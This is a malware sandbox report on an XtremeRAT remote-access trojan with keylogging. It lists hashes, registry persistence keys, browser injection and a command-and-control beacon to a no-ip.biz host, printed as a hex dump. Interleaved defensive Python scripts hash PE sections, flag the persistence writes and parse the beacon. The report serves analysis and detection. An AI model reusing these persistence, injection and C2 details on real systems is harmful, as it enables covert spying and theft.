Analysis Date: 2015-05-23 04:59:25
MD5: 919a4caad81c810bd25829816f4a388e
SHA1: 6894b96956de10c61116b0c44521df92b2015a2c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE md5: 077a359572cb42cb3e036251eb2e22b8 sha1: fb5d1450247cafb633ca5fda898426b409e21831 size: 34304
Section DATA md5: dc6aaa8531d0f010c4e89e692834971c sha1: 0457e65ddf397e8aa3f0dbc91a29ac57cba1a591 size: 512
Section BSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .idata md5: 884d0946d83d3de316ad2d2eb7c16a6a sha1: 8dcd8e183c015bafe3802deb5be0d8e118acf9d7 size: 3584
Section .tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .rdata md5: 2b44bd00623cc310df7d5458aa2dd5a3 sha1: 0119411a83671023e7bd8836d4b2185170b8ceab size: 512
Section .reloc md5: 4782a0d02a0277dc1751278c9c03f138 sha1: e2df0d0ca1c8a4d159c6a28db7fcc1a356589eb0 size: 2560
Section .rsrc md5: 3be0bc9ab2c696fdf65082b6f4f10ebe sha1: 3c4c0b68a87910b189ed79580a665ddeb70cc77e size: 4096
Timestamp: 1992-06-19 22:22:17 (the constant TimeDateStamp 0x2A425E19 that Delphi-built binaries carry; together with the CODE/DATA/BSS section names and the DVCLAL/PACKAGEINFO strings below it marks a Delphi build, not a 1992 compile date)
Version:
  LegalCopyright: ζπζσστβαπυλοκεσπφειπψσξπερκπωγ
  Assembly Version: 88.59.15.56
  InternalName: Assembly Changer.exe
  FileVersion: 47.5.36.75
  CompanyName: νωπζωζεωβκαρτγινπςλεζφπτβδηφζ
  LegalTrademarks: ωββαλβψππσρπηςσλερμβεμροχυδζ
  Comments: στυιαδηθδχιιυτωβοιηψγφωμιβακχυ
  ProductName: δδοσφανσλεελτομλππθωρηπυηιιμζπ
  ProductVersion: 47.5.36.75
  FileDescription: πθαψκγζθθλσωσεξακιηθπψσδξπςνυ
  OriginalFilename: Assembly Changer.exe
PEhash: aa2395ec9d3ee4dcb849d9ea16189543f2e8c31f
IMPhash: 781bcb1cdaf387c1f2f769461a041c02
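The Section rows and the Timestamp above are read straight out of the PE headers. The script below is added here as an example (it is not the sandbox's own code): it walks the section table, hashes each section's raw bytes the same way, and decodes the COFF TimeDateStamp. build_minimal_pe() fabricates a tiny PE purely as constructed test input so the script runs offline; it is not the analysed sample.

```python
"""Hash each section of a PE32 file the way the 'Section ... md5/sha1/size'
rows above are produced, and decode the COFF TimeDateStamp.
Added example: this is not the sandbox's code. build_minimal_pe() fabricates a
tiny PE purely as constructed test input; it is not the analysed sample."""
import hashlib
import struct
from datetime import datetime, timezone

# TimeDateStamp that every Delphi-built PE carries (1992-06-19 22:22:17 UTC):
# it is a compiler constant, not the build time.
DELPHI_TIMESTAMP = 0x2A425E19


def pe_section_hashes(data: bytes):
    """Return (timestamp, sections) where sections is a list of
    {"name", "size", "md5", "sha1"} dicts in section-table order."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsect, tstamp, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(nsect):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, table + i * 40)
        # A section with SizeOfRawData == 0 (BSS and .tls above) has no bytes on
        # disk, so it hashes as the empty string: md5 d41d8cd9..., sha1 da39a3ee...
        raw = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "size": raw_size,
            "md5": hashlib.md5(raw).hexdigest(),
            "sha1": hashlib.sha1(raw).hexdigest(),
        })
    return tstamp, sections


def timestamp_utc(ts: int) -> str:
    """Render a COFF TimeDateStamp (seconds since the Unix epoch) as UTC text."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def looks_delphi(ts: int, sections) -> bool:
    """Delphi fingerprint: the constant timestamp plus CODE/DATA/BSS section names."""
    return ts == DELPHI_TIMESTAMP and {"CODE", "DATA", "BSS"} <= {s["name"] for s in sections}


def build_minimal_pe(sections, timestamp=DELPHI_TIMESTAMP) -> bytes:
    """Constructed test input: a minimal PE32 with the given [(name, raw_bytes)]."""
    opt_size = 224                                        # PE32 optional header size
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)      # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # magic = PE32
    raw_ptr = 64 + 4 + 20 + opt_size + 40 * len(sections)    # first byte after headers
    table, body = b"", b""
    for name, raw in sections:
        table += struct.pack("<8sIIII", name.encode().ljust(8, b"\0"),
                             len(raw), 0x1000, len(raw), raw_ptr if raw else 0)
        table += b"\0" * 16                               # relocs/linenumbers/characteristics
        body += raw
        raw_ptr += len(raw)
    return dos + b"PE\0\0" + coff + opt + table + body


if __name__ == "__main__":
    import sys
    ts, secs = pe_section_hashes(open(sys.argv[1], "rb").read())
    print("Timestamp:", timestamp_utc(ts), "(Delphi constant)" if looks_delphi(ts, secs) else "")
    for s in secs:
        print(f"Section {s['name']:<8} md5: {s['md5']} sha1: {s['sha1']} size: {s['size']}")
```

Run it with a sample's path as the only argument to reproduce the Section rows. Section hashes are taken over SizeOfRawData bytes at PointerToRawData, so a section that exists only in memory (BSS, .tls) yields the empty-string digests, which is why two rows above share the same md5 and sha1.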

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝ C:\WINDOWS\InstallDir\Flash .exe
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{0O8QFCSV-HB35-C210-H1UF-A56S7A6GT6RG}\StubPath ➝ C:\WINDOWS\InstallDir\Flash .exe restart
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝ C:\WINDOWS\InstallDir\Flash .exe
Registry: HKEY_CURRENT_USER\SOFTWARE\((Mutex))\ServerStarted ➝ 5/23/2015 0:55:47 AM
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates File: C:\WINDOWS\InstallDir\Flash .exe
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).cfg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe
Creates Mutex: ((Mutex))
Creates Mutex: XTREMEUPDATE

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).dat
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: ZonesLockedCacheCounterMutex
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: ZonesCounterMutex
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: ((Mutex))
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: ZonesCacheCounterMutex
Winsock DNS: malek1990.no-ip.biz

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe
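The registry writes in the first process are the sample's persistence: a Run value in HKCU and one in HKLM, both pointing at the dropped Flash .exe, plus an Active Setup StubPath that runs the same file with a restart argument when a user logs on. Note that the beacon and the ((Mutex)) mutex come from iexplore.exe rather than malware.exe: the dropper starts the browser three times, and the imports (CreateRemoteThread, WriteProcessMemory, NtUnmapViewOfSection, SetThreadContext, ResumeThread) together with the UnitInjectProcess and %DEFAULTBROWSER% strings below are consistent with injection into it. The detection sketch below is an added example, not the sandbox's logic. It runs over event records constructed from the registry lines above plus one benign control record; the (hive, key, value, data) layout is an assumed one rather than any product's schema, and the rule that flags a value named after its own hive is a trait of this sample only.

```python
"""Flag the persistence writes listed under Runtime Details above: autorun
values and an Active Setup StubPath pointing at the dropped 'Flash .exe'.
Added example, not the sandbox's detection logic. EVENTS is constructed from
the report's registry lines plus one benign control record; the record layout
is an assumption, not any product's schema, and rule 3 is a sample trait."""
import re

# Constructed events: the four writes from the report and one benign control.
EVENTS = [
    {"hive": "HKCU", "key": r"Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "HKCU", "data": r"C:\WINDOWS\InstallDir\Flash .exe"},
    {"hive": "HKLM",
     "key": r"Software\Microsoft\Active Setup\Installed Components\{0O8QFCSV-HB35-C210-H1UF-A56S7A6GT6RG}",
     "value": "StubPath", "data": r"C:\WINDOWS\InstallDir\Flash .exe restart"},
    {"hive": "HKLM", "key": r"Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "HKLM", "data": r"C:\WINDOWS\InstallDir\Flash .exe"},
    {"hive": "HKCU", "key": r"SOFTWARE\((Mutex))", "value": "ServerStarted",
     "data": "5/23/2015 0:55:47 AM"},
    # benign control (constructed): autorun for a program under Program Files
    {"hive": "HKCU", "key": r"Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "ExampleUpdater", "data": r"C:\Program Files\Example\updater.exe"},
]

# Autorun locations; the sample's strings list all three of these keys.
AUTORUN_KEYS = {
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
    r"software\microsoft\windows\currentversion\policies\explorer\run",
}
ACTIVE_SETUP = "software\\microsoft\\active setup\\installed components\\"
GUID_RE = re.compile(
    r"^\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}$", re.I)
TRUSTED_DIRS = ("c:\\program files\\", "c:\\windows\\system32\\")


def exe_path(data: str) -> str:
    """Executable path of a command line, i.e. everything up to the first '.exe'.
    Splitting on whitespace would break on the sample's 'Flash .exe' name."""
    m = re.match(r"\s*\"?(.+?\.exe)\"?(?:\s|$)", data, re.I)
    return m.group(1) if m else data.strip()


def findings(events):
    """Return (event index, rule name) pairs for every rule an event trips."""
    hits = []
    for i, ev in enumerate(events):
        key = ev["key"].lower().strip("\\")
        path = exe_path(ev["data"]).lower()
        if key in AUTORUN_KEYS:
            # Rule 1: autorun target outside Program Files / system32
            if not path.startswith(TRUSTED_DIRS):
                hits.append((i, "autorun-untrusted-path"))
            # Rule 3 (this sample's trait): value named after the hive it sits in
            if ev["value"].upper() == ev["hive"].upper():
                hits.append((i, "autorun-value-named-hive"))
        elif key.startswith(ACTIVE_SETUP) and ev["value"].lower() == "stubpath":
            # Rule 2: StubPath whose component name is not a well-formed GUID
            # (the sample's contains non-hex letters) or that launches from an
            # untrusted directory; the sample does both.
            component = key[len(ACTIVE_SETUP):]
            if not GUID_RE.match(component) or not path.startswith(TRUSTED_DIRS):
                hits.append((i, "active-setup-stubpath"))
        # Rule 4: whitespace immediately before the .exe extension ('Flash .exe')
        if re.search(r"\s\.exe\b", path):
            hits.append((i, "space-before-exe"))
    return hits


if __name__ == "__main__":
    for idx, rule in findings(EVENTS):
        ev = EVENTS[idx]
        print(f"{rule:<26} {ev['hive']}\\{ev['key']}\\{ev['value']} -> {ev['data']}")
```

Rules 1, 2 and 4 generalise beyond this sample; rule 3 is only worth keeping while this builder's value-naming habit holds. The ServerStarted timestamp under HKCU\SOFTWARE\((Mutex)) trips none of them and is left as a hunting artefact rather than a rule.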

Network Details:

DNS: malek1990.no-ip.biz
Type: A
Answer: 46.60.82.246
HTTP GET: http://malek1990.no-ip.biz:8085/1234567890.functions (nine identical requests, one per TCP flow below)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 46.60.82.246:8085
Flows TCP: 192.168.1.1:1033 ➝ 46.60.82.246:8085
Flows TCP: 192.168.1.1:1034 ➝ 46.60.82.246:8085
Flows TCP: 192.168.1.1:1035 ➝ 46.60.82.246:8085
Flows TCP: 192.168.1.1:1036 ➝ 46.60.82.246:8085
Flows TCP: 192.168.1.1:1037 ➝ 46.60.82.246:8085
Flows TCP: 192.168.1.1:1038 ➝ 46.60.82.246:8085
Flows TCP: 192.168.1.1:1039 ➝ 46.60.82.246:8085
Flows TCP: 192.168.1.1:1040 ➝ 46.60.82.246:8085

Raw Pcap
0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

(The remaining eight flows carry the same 228-byte request byte for byte; their dumps are omitted.)

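To turn a Raw Pcap dump like the one above back into bytes and pull the beacon's indicators out of it, the parser below is added here as an example (it is not the sandbox's tooling). RAW_PCAP is the first flow's dump copied from the report rather than a new capture; the parser checks that offsets are contiguous so a dropped line is reported instead of silently corrupting the request, and the final rule is derived from this single sample and assumes nothing beyond what the dump shows.

```python
"""Rebuild the request bytes from the sandbox 'Raw Pcap' hex dump above and
parse the HTTP request so the beacon's host, port, path and User-Agent can be
pulled out as indicators. Added example, not the sandbox's own tooling.
RAW_PCAP is the first flow's dump copied from the report, not a new capture;
matches_sample_beacon() is derived from this one sample."""
import re

RAW_PCAP = """\
0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0;
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1;
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host:
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....
"""

DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]+)\s+\(\d+\)\s+")
HEX_WIDTH = 35  # four groups of eight hex digits plus three separating spaces


def hexdump_to_bytes(dump: str) -> bytes:
    """Decode the hex column of each dump line; the ASCII column is ignored.
    Offsets must be contiguous, so a missing or reordered line raises."""
    out = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue  # blank or non-dump line
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"offset gap before {line[:10]}")
        out += bytes.fromhex(line[m.end():m.end() + HEX_WIDTH].replace(" ", ""))
    return bytes(out)


def parse_http_request(raw: bytes) -> dict:
    """Split the request line and headers; header names are lower-cased."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: no blank line after headers")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def beacon_indicators(req: dict) -> dict:
    """Host, port, path and User-Agent of the request, ready for a blocklist."""
    host, _, port = req["headers"].get("host", "").partition(":")
    return {"host": host, "port": int(port) if port else 80,
            "path": req["target"],
            "user_agent": req["headers"].get("user-agent", "")}


def matches_sample_beacon(req: dict) -> bool:
    """Rule derived from this sample only: a GET for a '.functions' resource
    with the fixed MSIE 6.0 / Windows NT 5.1 User-Agent seen above."""
    ua = req["headers"].get("user-agent", "")
    return (req["method"] == "GET" and req["target"].endswith(".functions")
            and ua.startswith("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;"))


if __name__ == "__main__":
    request = parse_http_request(hexdump_to_bytes(RAW_PCAP))
    print(beacon_indicators(request), matches_sample_beacon(request))
```

The User-Agent is hard-coded in the request rather than taken from the injected browser, so it stays constant across hosts; the ".functions" suffix also appears in the binary's string list, which is what makes the path rule worth keeping alongside the domain and IP.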

Strings
- 
....
/.
 --- 
000004b0
47.5.36.75
88.59.15.56
[Accept]
[Arrow Down]
[Arrow Left]
[Arrow Right]
[Arrow Up]
Assembly Changer.exe
Assembly Version
[Backspace]
[Back Tab]
BINDER
[Caps Lock]
.cfg
[CLIPBOARD] ---- 
[CLIPBOARD END]
Comments
CompanyName
CONFIG
[Context Menu]
[Copy]
.dat
%DEFAULTBROWSER%
[Delete]
DVCLAL
[End]
ENDSERVERBUFFER
[Esc]
.exe
[Execute]
explorer.exe
explorer.exe 
[F1]
[F10]
[F11]
[F12]
[F13]
[F14]
[F15]
[F16]
[F17]
[F18]
[F19]
[F2]
[F20]
[F21]
[F22]
[F23]
[F24]
[F3]
[F4]
[F5]
[F6]
[F7]
[F8]
[F9]
FakeMessage
FileDescription
FileVersion
[Finish]
frgjbfdkbnfsdjbvofsjfrfre
frgkmjgtmklgtlrglt
.functions
[Help]
hgtrfsgfrsgfgregtregtr
[Home]
http://
[Insert]
InstalledServer
InternalName
jiejwogfdjieovevodnvfnievn
jytjyegrsfvfbgfsdf
/K$?
KeyDelBackspace
LastSize
[Left Alt]
[Left Ctrl]
LegalCopyright
LegalTrademarks
Load
local
[Mail]
[Media]
\Microsoft\Windows\
[Mode Change]
Mutex
[Next Track]
%NOINJECT%
[Num Lock]
Numpad
[Numpad -]
[Numpad /]
[Numpad .]
[Numpad *]
[Numpad +]
open
OriginalFilename
PACKAGEINFO
[Page Down]
[Page Up]
[Pause]
[Play]
[Play / Pause]
[Previous Track]
[Print]
[Print Screen]
[Process]
ProductName
ProductVersion
[Reset]
restart
 restart
[Right Alt]
[Right Ctrl]
[Scrol Lock]
[Select]
[Separator]
ServerStarted
Shell
[Sleep]
SOFTWARE\
SOFTWARE\FakeMessage
Software\Microsoft\Active Setup\Installed Components\
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows NT\CurrentVersion\Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\XtremeRAT
[Stop]
StringFileInfo
StubPath
svchost.exe
[Tab]
Translation
trhgtehgfsgrfgtrwegtre
VarFileInfo
[Volume Down]
[Volume Mute]
[Volume Up]
VS_VERSION_INFO
x.html
.xtr
XTREME
XTREMEBINDER
XtremeKeylogger
Xtreme RAT
XTREMEUPDATE
[Zoom]
;+<<<]<
$0(0,0004080<0D0H0L0l0p0t0
0"0*020:0B0J0R0Z0b0j0r0z0
0&0,090>0C0M0V0\0e0q0
%06789:;<&'()*+,-./12345
0b1g1l1q1}1
>$>0>>>D>N>S>j>v>
1"1:1b1#4/4<4N4
1&191F1R1W1a1f1l1v1
1?1X1q1
1kZ/Y|9Y
2%20252:2D2T2\2d2o2t2~2
2"2&2*2.22262:2>2B2F2J2N2R2V2Z2^2b2f2j2n2r2v2z2~2
2#2*2:2T2_2e2s2
273=3R3c3
2Functions
:+:2:S:
3"3(31373B3N3W3_3k3y3
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3b3f3j3q3
3"3,3C3O3V3h3z3
3[4g4n4
3J3f3r3
424:4B4J4R4Z4b4j4r4z4
4,4=4N4_4p4
4$4Y4`4
4=5w5}5
<#<-<4<9<E<U<f<u<
5"5*525:5B5J5R5Z5b5j5r5z5
5+5<5M5^5o5
5K6Q6w6
5K6X6^6h6t6|6
5N6X6b6l6v6
6"6*626:6B6J6R6Z6b6j6r6z6
6*6;6L6]6n6
6?6>7F7N7
686B6i6n6s6
>6?C?K?]?
=&>.>6>O>
7%767c7i7t7
7&7=7C7T7Z7w7}7
7)7:7K7\7m7~7
7<7R7g7s7
7&7r7x7
7c8o8|8
829=9G9Q9[9e9
8"8,868H8\8`8d8h8l8p8t8x8|8
8+8:8?8`8x8w;
8"8[8i8t8
8(898J8[8l8}8
8"8G8S8\8
8$919<9F9w9
939=9M9_9
99:?:K:R:j:w:
?%?9?C?V?\?p?
;9;E;J;t;y;
*^>9X%
9@:Y:b:o:
advapi32.dll
:a>k>	?
CallNextHookEx
CharLowerW
CharNextW
CharUpperW
CloseClipboard
CloseHandle
CopyFileW
CreateDirectoryW
CreateFileW
CreateMutexW
CreateProcessW
CreateRemoteThread
CreateThread
CreateToolhelp32Snapshot
CreateWindowExW
DefWindowProcA
DeleteFileW
DeleteUrlCacheEntryW
DispatchMessageA
=/><>D>V>
ExitProcess
FindExecutableW
FindFirstFileW
FindResourceW
FreeLibrary
FreeResource
FtpPutFileW
FtpSetCurrentDirectoryW
GetClipboardData
GetCommandLineW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDateFormatW
GetDesktopWindow
GetFileAttributesW
GetFileSize
GetForegroundWindow
GetKeyboardLayout
GetKeyboardState
GetKeyState
GetLastError
GetLocalTime
GetModuleFileNameExW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetSystemDirectoryW
GetSystemTime
GetTempPathW
GetThreadContext
GetTimeFormatW
GetWindowRect
GetWindowsDirectoryW
GetWindowTextW
GetWindowThreadProcessId
GlobalLock
GlobalSize
GlobalUnlock
HeapAlloc
HeapFree
HeapReAlloc
Hf;4Cu
.idata
InternetCloseHandle
InternetConnectW
InternetOpenW
;&;.;<;J;{;
JM8@*B
;j<t<~<
k38O~m
kernel32.dll
Kernel32.dll
:&:=:K:`:l:z:
KWindows
?L?d?w?
LoadLibraryA
LoadResource
LocalAlloc
LocalFileTimeToFileTime
LockResource
lstrlenW
MapVirtualKeyW
MessageBoxW
MultiByteToWideChar
NJ$>CUP#
ntdll.dll
NtSetInformationProcess
NtUnmapViewOfSection
;-;N;Z;x;
oleaut32.dll
OpenClipboard
OpenProcess
PeekMessageA
Portions Copyright (c) 1999,2003 Avenger by NhT
PostMessageA
P.reloc
Process32FirstW
Process32NextW
P.rsrc
PSAPI.dll
?!?P?U?x?}?
q6q4_!e
QQQQQQQSVW
QQQQQQS
R1Y1f1
RaiseException
.rdata
ReadFile
ReadProcessMemory
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegisterClassW
RegisterWindowMessageW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
ResumeThread
RtlUnwind
SendMessageA
SetClipboardViewer
SetEndOfFile
SetErrorMode
SetFileAttributesW
SetFilePointer
SetFileTime
SetProcessDEPPolicy
SetThreadContext
SetThreadPriority
SetWindowsHookExW
SHDeleteKeyW
shell32.dll
Shell32.dll
ShellExecuteW
SHGetMalloc
SHGetPathFromIDListW
SHGetSpecialFolderLocation
shlwapi.dll
ShowWindow
SizeofResource
SysAllocStringLen
SysFreeString
SysInit
SysReAllocStringLen
System
SystemTimeToFileTime
;!;/;T;
TerminateProcess
TerminateThread
This program must be run under Win32
TlsGetValue
TlsSetValue
ToUnicodeEx
TranslateMessage
?"?'???U?c?s?
UnhandledExceptionFilter
UnhookWindowsHookEx
UnitConfigs
UnitCryptString
UnitGetServer
UnitInjectProcess
UnitInjectServer
UnitInstallServer
UnitKeylogger
URLDownloadToFileW
urlmon.dll
; <.<U<s<
user32.dll
UTypes
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualFreeEx
VirtualProtectEx
WaitForSingleObject
WideCharToMultiByte
WideString
wininet.dll
=#=W=l=
WriteFile
WriteProcessMemory
WVXEGHF@A
;W]XV.
YUnitBinder
_^[YY]
YZ]_^[